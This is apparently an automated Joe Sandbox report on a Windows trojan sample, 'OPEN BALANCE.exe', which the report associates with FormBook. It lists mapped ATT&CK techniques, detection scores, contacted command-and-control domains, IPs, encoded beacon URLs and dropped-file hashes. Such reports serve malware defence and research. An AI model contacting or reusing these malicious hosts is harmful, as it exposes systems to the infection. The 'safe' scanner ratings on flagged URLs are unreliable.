Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	31 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Software Packing	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
OPEN BALANCE.exe	47%	ReversingLabs	Win32.Trojan.Strab
OPEN BALANCE.exe	34%	Virustotal		Browse
OPEN BALANCE.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
yp78w.top	0%	Virustotal	Browse
worldheadline.xyz	1%	Virustotal	Browse
www.michaelstutorgroup.com	0%	Virustotal	Browse
www.worldheadline.xyz	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.corbincodes.tech/m0g5/	0%	Avira URL Cloud	safe
http://www.counseloratlaw1806.xyz/lxy9/	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.gzlxdj1921.com/ggr3/?JNx8tTw=+ulKtzjhC/pF9uoDIL96mS+Q2gVwjVfYnGC5dhxw+14/MHoXjYhMFpwJCtX2zxSL+1u8Kqx4aLSiOAPYuX8wC92mPQi5Iz3Ed95V/6CV65glQfCAW8c6AwGpbOMtcs+eTg==&F0a=DDvTXr_Hk	0%	Avira URL Cloud	safe
http://www.worldheadline.xyz/index.php?page=categories	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://www.michaelstutorgroup.com/bk2c/?JNx8tTw=fyR/dS20qv8EXSd8u+Bcgvv3xf0q4er0Bfje+Rii9aayzDLrig5kNBZNNidIJWoLGG2wTsvUDg8b8pJZ+WjXr6oyts3SJgHwjkutIwVayIFFDsRDIWHfWbE9GGLqUV2/ag==&F0a=DDvTXr_Hk	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.worldheadline.xyz/index.php	0%	Avira URL Cloud	safe
http://www.kawambwa-sugar.com/gjm3/	0%	Avira URL Cloud	safe
http://www.worldheadline.xyz/t7vt/?JNx8tTw=uDGK8VjmNJjS9S78Zu3fjPk+qbPTeN8FCtxt9GSvaaiUOHuM2RHrw8XoT9PDXAl+CqF8gx2YQ/m+f5qIVb5xWNdhTtWiVvoVTDqmbClT5EaAJa6SCw+I3UYWCEeU2WlC1g==&F0a=DDvTXr_Hk	0%	Avira URL Cloud	safe
http://www.michaelstutorgroup.com/bk2c/	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.by8991.vip/0190/	0%	Avira URL Cloud	safe
http://www.by8991.vip/0190/?F0a=DDvTXr_Hk&JNx8tTw=Z6ERJFoDCUfQsIq8ofQDjrU1/9I1+MRHON9wFl6H5eE5mUn/k+ER1FqTfAe8nYNZ1iEuv5/EQNBLECXnnxN4D66rqY36fh1KhKiNJpoJ9uKwS3VDPLljB2Epzr3xCgB2gg==	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
http://www.worldheadline.xyz/index.php?page=contact	0%	Avira URL Cloud	safe
http://www.worldheadline.xyz/index.php?page=most-read	0%	Avira URL Cloud	safe
http://www.worldheadline.xyz/index.php?page=terms	0%	Avira URL Cloud	safe
https://www.google.com	0%	Virustotal		Browse
https://www.by3393.com:35522/register?i_code=2867599	0%	Avira URL Cloud	safe
http://www.worldheadline.xyz/index.php?page=latest	0%	Avira URL Cloud	safe
http://www.yp78w.top/uum0/	0%	Avira URL Cloud	safe
http://www.kawambwa-sugar.com/gjm3/?JNx8tTw=PeXQ/0fKICzM5BJz6p9ArJpLN7UVrkFd1P+d/QKATQOsfeoG8d5Si8/kOzzLJ6xWOh7b+xseW4maj8a6yNy3oL5cFlzPj7mwU9Y3C34E4mLKEtfNI6H114erhWwp1eiAVA==&F0a=DDvTXr_Hk	0%	Avira URL Cloud	safe
http://www.counseloratlaw1806.xyz/lxy9/?JNx8tTw=aMYCWBWby78cu2Pg5kxC7/s+ledqG+yLUHOKH+0jK4PAR/gCFqdm34ajEirZUZfXHWNx+XxCFLbhto71FEYU7CwGQbfx96/8sGe6uy0dOdRuFla+tLr5WY0xGsTDrvD3UQ==&F0a=DDvTXr_Hk	0%	Avira URL Cloud	safe
http://www.gzlxdj1921.com/ggr3/	0%	Avira URL Cloud	safe
http://www.corbincodes.tech	0%	Avira URL Cloud	safe
https://www.michaelstutorgroup.com/bk2c/?JNx8tTw=fyR/dS20qv8EXSd8u	0%	Avira URL Cloud	safe
http://www.worldheadline.xyz.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
86f894fb.by8991.vip.cname.scname.com	65.181.134.177	true	false		unknown
www.corbincodes.tech	3.33.244.179	true	false		unknown
yp78w.top	38.181.21.136	true	false	0%, Virustotal, Browse	unknown
www.gzlxdj1921.com	47.238.77.168	true	false		unknown
www.counseloratlaw1806.xyz	199.59.243.226	true	true		unknown
worldheadline.xyz	192.236.177.190	true	true	1%, Virustotal, Browse	unknown
www.michaelstutorgroup.com.cdn.hstgr.net	84.32.84.65	true	false		unknown
kawambwa-sugar.com	3.33.130.190	true	false		unknown
www.by8991.vip	unknown	unknown	true		unknown
www.michaelstutorgroup.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.worldheadline.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.yp78w.top	unknown	unknown	true		unknown
www.kawambwa-sugar.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.gzlxdj1921.com/ggr3/?JNx8tTw=+ulKtzjhC/pF9uoDIL96mS+Q2gVwjVfYnGC5dhxw+14/MHoXjYhMFpwJCtX2zxSL+1u8Kqx4aLSiOAPYuX8wC92mPQi5Iz3Ed95V/6CV65glQfCAW8c6AwGpbOMtcs+eTg==&F0a=DDvTXr_Hk	false	Avira URL Cloud: safe	unknown
http://www.counseloratlaw1806.xyz/lxy9/	false	Avira URL Cloud: safe	unknown
http://www.corbincodes.tech/m0g5/	false	Avira URL Cloud: safe	unknown
http://www.michaelstutorgroup.com/bk2c/?JNx8tTw=fyR/dS20qv8EXSd8u+Bcgvv3xf0q4er0Bfje+Rii9aayzDLrig5kNBZNNidIJWoLGG2wTsvUDg8b8pJZ+WjXr6oyts3SJgHwjkutIwVayIFFDsRDIWHfWbE9GGLqUV2/ag==&F0a=DDvTXr_Hk	false	Avira URL Cloud: safe	unknown
http://www.kawambwa-sugar.com/gjm3/	false	Avira URL Cloud: safe	unknown
http://www.worldheadline.xyz/t7vt/?JNx8tTw=uDGK8VjmNJjS9S78Zu3fjPk+qbPTeN8FCtxt9GSvaaiUOHuM2RHrw8XoT9PDXAl+CqF8gx2YQ/m+f5qIVb5xWNdhTtWiVvoVTDqmbClT5EaAJa6SCw+I3UYWCEeU2WlC1g==&F0a=DDvTXr_Hk	false	Avira URL Cloud: safe	unknown
http://www.michaelstutorgroup.com/bk2c/	false	Avira URL Cloud: safe	unknown
http://www.by8991.vip/0190/	false	Avira URL Cloud: safe	unknown
http://www.by8991.vip/0190/?F0a=DDvTXr_Hk&JNx8tTw=Z6ERJFoDCUfQsIq8ofQDjrU1/9I1+MRHON9wFl6H5eE5mUn/k+ER1FqTfAe8nYNZ1iEuv5/EQNBLECXnnxN4D66rqY36fh1KhKiNJpoJ9uKwS3VDPLljB2Epzr3xCgB2gg==	false	Avira URL Cloud: safe	unknown
http://www.yp78w.top/uum0/	false	Avira URL Cloud: safe	unknown
http://www.kawambwa-sugar.com/gjm3/?JNx8tTw=PeXQ/0fKICzM5BJz6p9ArJpLN7UVrkFd1P+d/QKATQOsfeoG8d5Si8/kOzzLJ6xWOh7b+xseW4maj8a6yNy3oL5cFlzPj7mwU9Y3C34E4mLKEtfNI6H114erhWwp1eiAVA==&F0a=DDvTXr_Hk	false	Avira URL Cloud: safe	unknown
http://www.counseloratlaw1806.xyz/lxy9/?JNx8tTw=aMYCWBWby78cu2Pg5kxC7/s+ledqG+yLUHOKH+0jK4PAR/gCFqdm34ajEirZUZfXHWNx+XxCFLbhto71FEYU7CwGQbfx96/8sGe6uy0dOdRuFla+tLr5WY0xGsTDrvD3UQ==&F0a=DDvTXr_Hk	false	Avira URL Cloud: safe	unknown
http://www.gzlxdj1921.com/ggr3/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.worldheadline.xyz/index.php?page=categories	attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.worldheadline.xyz/index.php	attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3919772809.00000000040EE000.00000004.10000000.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.000000000317E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.worldheadline.xyz/index.php?page=contact	attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.worldheadline.xyz/index.php?page=most-read	attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.worldheadline.xyz/index.php?page=terms	attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.by3393.com:35522/register?i_code=2867599	attrib.exe, 00000005.00000002.3919772809.0000000004280000.00000004.10000000.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.0000000003310000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.worldheadline.xyz/index.php?page=latest	attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.corbincodes.tech	VnZdrTcLqvUA.exe, 00000008.00000002.3918414894.00000000006A8000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.michaelstutorgroup.com/bk2c/?JNx8tTw=fyR/dS20qv8EXSd8u	attrib.exe, 00000005.00000002.3919772809.0000000003AA6000.00000004.10000000.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.0000000002B36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	attrib.exe, 00000005.00000002.3921802984.000000000794A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.worldheadline.xyz.	attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.236.177.190	worldheadline.xyz	United States	54290	HOSTWINDSUS	true
47.238.77.168	www.gzlxdj1921.com	United States	20115	CHARTER-20115US	false
65.181.134.177	86f894fb.by8991.vip.cname.scname.com	United States	7859	PAIR-NETWORKSUS	false
84.32.84.65	www.michaelstutorgroup.com.cdn.hstgr.net	Lithuania	33922	NTT-LT-ASLT	false
199.59.243.226	www.counseloratlaw1806.xyz	United States	395082	BODIS-NJUS	true
38.181.21.136	yp78w.top	United States	174	COGENT-174US	false
3.33.130.190	kawambwa-sugar.com	United States	8987	AMAZONEXPANSIONGB	false
3.33.244.179	www.corbincodes.tech	United States	8987	AMAZONEXPANSIONGB	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482866
Start date and time:	2024-07-26 09:38:57 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OPEN BALANCE.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@8/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 46 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
03:41:18	API Interceptor	4536883x Sleep call for process: attrib.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
65.181.134.177	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	www.by8991.vip/1sgd/
84.32.84.65	http://hentaiwikis.com	Get hash	malicious	Unknown	Browse	hentaiwikis.com/
199.59.243.226	LisectAVT_2403002A_327.dll	Get hash	malicious	Wannacry	Browse	ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20240726-0534-055f-94f1-815196e9c5be
	https://budget.us.avgcustomerservice.com/login	Get hash	malicious	Unknown	Browse	ww1.avgcustomerservice.com/_tr
	LisectAVT_2403002B_215.exe	Get hash	malicious	Unknown	Browse	survey-smiles.com/
	LisectAVT_2403002B_215.exe	Get hash	malicious	Unknown	Browse	survey-smiles.com/
	LisectAVT_2403002B_290.exe	Get hash	malicious	Bdaejec	Browse	ww88.ssofhoseuegsgrfnu.ru/
	LisectAVT_2403002B_401.exe	Get hash	malicious	CryptOne	Browse	y9rs01tp.xtreemhost.com/v9y1e4.b5l
	LisectAVT_2403002C_186.exe	Get hash	malicious	Upatre	Browse	welfareofmankind.com/css/11k2.zip
	Ia93PTYivQ.exe	Get hash	malicious	BlackMoon, Neshta	Browse	ww25.qq678833.f08.87yun.club/hm.dat?subid1=20240724-2130-4963-a2d0-60eb4ce1cb7b
	RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exe	Get hash	malicious	FormBook	Browse	www.exadata.com/4jun/
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	ww25.pdf-158137.artsf.org/?subid1=20240723-2130-58ba-beb8-efc68c1d8691

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
86f894fb.by8991.vip.cname.scname.com	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	65.181.134.177
www.michaelstutorgroup.com.cdn.hstgr.net	payment swift 77575.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	154.62.105.32

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0	Get hash	malicious	Unknown	Browse	84.32.84.212
	http://www.cabrerallamas.com/	Get hash	malicious	Unknown	Browse	84.32.84.136
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.225
	LisectAVT_2403002C_3.exe	Get hash	malicious	FormBook	Browse	84.32.84.102
	PO#O_0140724.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	kJs0JTLO6I.exe	Get hash	malicious	Metasploit	Browse	84.32.84.139
	rFormulariodeso.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.16
	4Ear91jgQ7.exe	Get hash	malicious	FormBook	Browse	84.32.84.121
	Fzfee1Lgc2.elf	Get hash	malicious	Unknown	Browse	84.32.84.122
CHARTER-20115US	xd.mips.elf	Get hash	malicious	Mirai	Browse	96.34.36.255
	ppc.elf	Get hash	malicious	Mirai	Browse	97.88.203.166
	sh4.elf	Get hash	malicious	Mirai	Browse	24.207.185.94
	LisectAVT_2403002B_309.exe	Get hash	malicious	Bdaejec, FormBook	Browse	47.239.13.172
	LisectAVT_2403002B_413.exe	Get hash	malicious	Unknown	Browse	47.238.57.143
	LisectAVT_2403002B_413.exe	Get hash	malicious	Unknown	Browse	47.238.57.143
	arm7.elf	Get hash	malicious	Mirai	Browse	71.80.124.11
	nX1oQE2we8.exe	Get hash	malicious	CryptOne, Qbot	Browse	47.40.244.237
	LisectAVT_2403002C_3.exe	Get hash	malicious	FormBook	Browse	47.239.13.172
	LisectAVT_2403002C_48.dll	Get hash	malicious	Qbot	Browse	71.10.43.79
PAIR-NETWORKSUS	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	65.181.132.188
	statment-document.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	216.92.3.120
	https://softworldinc.wpengine.com	Get hash	malicious	Unknown	Browse	216.92.222.31
	OrderPI.exe	Get hash	malicious	FormBook	Browse	65.181.134.97
	skIHokJN0S.elf	Get hash	malicious	Unknown	Browse	66.39.84.177
	file.exe	Get hash	malicious	FormBook	Browse	65.181.132.158
	63HUYW299f.elf	Get hash	malicious	Unknown	Browse	216.92.200.205
	Your file name without extension goes here.exe	Get hash	malicious	FormBook	Browse	65.181.134.177
	file.exe	Get hash	malicious	FormBook	Browse	65.181.132.158
	hkLFB22XxS.exe	Get hash	malicious	FormBook	Browse	65.181.132.158
HOSTWINDSUS	E1511E934906072C0717E68C0A05B04C61846F7AD15CE323B61F854A24C86B15.exe	Get hash	malicious	Bdaejec	Browse	23.254.217.192
	D3692D3823BD5E165D88E97BB2C2673489FF76FB873BB28543A2F233C9FE4FF9.exe	Get hash	malicious	Bdaejec	Browse	23.254.217.192
	C72AA9C4DF96E6768A8A1DB299A8E787AC729FAA40C536FA4344F82D4670A947.exe	Get hash	malicious	Bdaejec	Browse	23.254.217.192
	9310DAF6D10F4FBFAF390E74BCF1C4D9ACC023D7DB3E26030F8772528572A22A.exe	Get hash	malicious	Bdaejec	Browse	23.254.217.192
	403DA0C043C2998DA98D36702AF8795548DC51B836BE342D9F2BE808B07D6FB9.exe	Get hash	malicious	Bdaejec	Browse	23.254.217.192
	http://hwylovermk.shop/product_details/5509027.html	Get hash	malicious	Unknown	Browse	104.168.132.133
	157757F5065076824EA142B1E3910B51326149A0A457F986CC4270B5FEC1D319.exe	Get hash	malicious	Bdaejec	Browse	23.254.217.192
	11D70988C6BB7174DD4050DB008C278920F14CBFA54920655AD1BDBAEE082700.exe	Get hash	malicious	Bdaejec	Browse	23.254.133.7
	0F8D2648166184BDE6562F33B7E4B620313FE7A21746720D37594213FBA7A604.exe	Get hash	malicious	Bdaejec	Browse	23.254.133.7
	Messaggi in quarantena.zip	Get hash	malicious	HTMLPhisher	Browse	104.168.151.63

Process:	C:\Windows\SysWOW64\attrib.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autB109.tmp

Download File

Process:	C:\Users\user\Desktop\OPEN BALANCE.exe
File Type:	data
Category:	dropped
Size (bytes):	285184
Entropy (8bit):	7.994611711967498
Encrypted:	true
SSDEEP:	6144:E6Ms1eXVoqHSEprbPYE98zycy/nP72yaRDD37sm9CGSR7+29vt8:teyqHrU4PSyaxJVu+2H8
MD5:	B5C847F5D1E8C325A2C399B0501824C1
SHA1:	B2463AAA9A313A6DE067F15051B6089130C5040B
SHA-256:	5BC1EF2D32BE8693B5BF5EB6EF74E9FA41AD77CE8B6A3E9196EA0901C5278478
SHA-512:	8F24C73BD6DF1BD0BD3E2136FE66E79337EA7E8B66011BF28F8C456469FAB2D4E698F8BE739A3F51DA21C71444F77FEF401998E84838C626FE794BE60AE99022
Malicious:	false
Reputation:	low
